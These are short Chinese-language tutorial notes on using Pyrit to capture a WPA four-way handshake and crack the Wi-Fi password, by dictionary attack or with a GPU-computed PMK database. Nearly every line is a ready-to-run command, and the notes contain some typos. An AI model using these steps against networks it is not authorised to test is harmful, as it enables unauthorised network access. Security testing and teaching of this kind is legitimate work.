優勢:
可運用GPU的運算加速生成PMK
本身支持抓包獲取四步五首過程,無需用Airodump抓包
也支持傳統的讀取airodump抓包獲取四步握手的方式
只抓取WAP四次握手過程包
pyrit -r wlan0mon -o wpapyrit.cap sripLive# -o 生成握手信息 sripLive 剔除不需要的數據包
pyrit -r wpapyrit.cap analyze進行分析查看是否有握手信息
也可從airodump抓握手包導入並篩選(airodump抓到的包和pyrit格式不一樣,需要在使用之前進行數據轉換)
pyrit -r wpa.cap -o wpapyrit.cap strip
使用密碼字典直接分析(速度比較慢)
pyrit -r wpapyrit.cap -i /usr/share/john/password.lst -b 00:11:22:33:44:55 attack_passthrough#-r 使用的握手包 -b AP的MAC地址
使用數據庫破解:
1.查看默認數據庫狀態:pyrit eval
2.導入密碼字典(自動剔除不合法密碼): pyrit -i password.lst import passwords
3.指定ESSID:pyrit -e TP_Link722 create essid
4.計算PMK: pyrit batch (默認啓用GPU)
5.分析密碼:pyrit -r wpapyrit.cap -b 00:11:22:33:44:55 attack.db
得出最終的密碼: